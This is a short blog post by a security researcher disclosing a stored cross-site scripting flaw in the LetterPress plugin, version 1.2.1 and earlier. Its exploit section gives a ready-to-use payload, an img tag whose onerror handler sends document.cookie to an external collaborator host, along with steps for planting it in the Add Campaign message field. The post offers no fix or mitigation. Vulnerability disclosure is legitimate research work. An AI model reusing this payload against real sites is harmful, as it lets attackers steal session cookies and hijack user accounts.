P.L.SANU

Cyber Security Engineer

Information Security Analyst

Security Researcher

Full Stack Developer

P.L.SANU

Cyber Security Engineer

Information Security Analyst

Security Researcher

Full Stack Developer

Blog Post

LetterPress <= 1.2.1 – Cookie Stealing Vulnerability

Exploit Title: LetterPress <= 1.2.1 – Cookie Stealing Vulnerability
Exploit Author: P.L.Sanu
CVE:
CVSS:
References: https://github.com/plsanu/LetterPress-1.2.1-Cookie-Stealing-Vulnerability

Description:
In LetterPress plugin <= 1.2.1 is vulnerable to Cookie Stealing Vulnerability. An attacker can able to steal the cookies by injecting the JavaScript code.

Exploit:
1. In LetterPress plugin navigate to Add Campaign and insert the code “<img src=x onerror=”location.href=’https://masdctnkppwsmnzsddestjmlhih74l9tt.oast.fun?c=’+ document.cookie”>” in HTML Campaign Message input field and click on Save Campaign.
2. View the campaign and monitor the requests & responses in 3rd party site (Ex: burpcollaborator)
3. The cookies values are passed in the GET parameter of 3rd party site.

Write a comment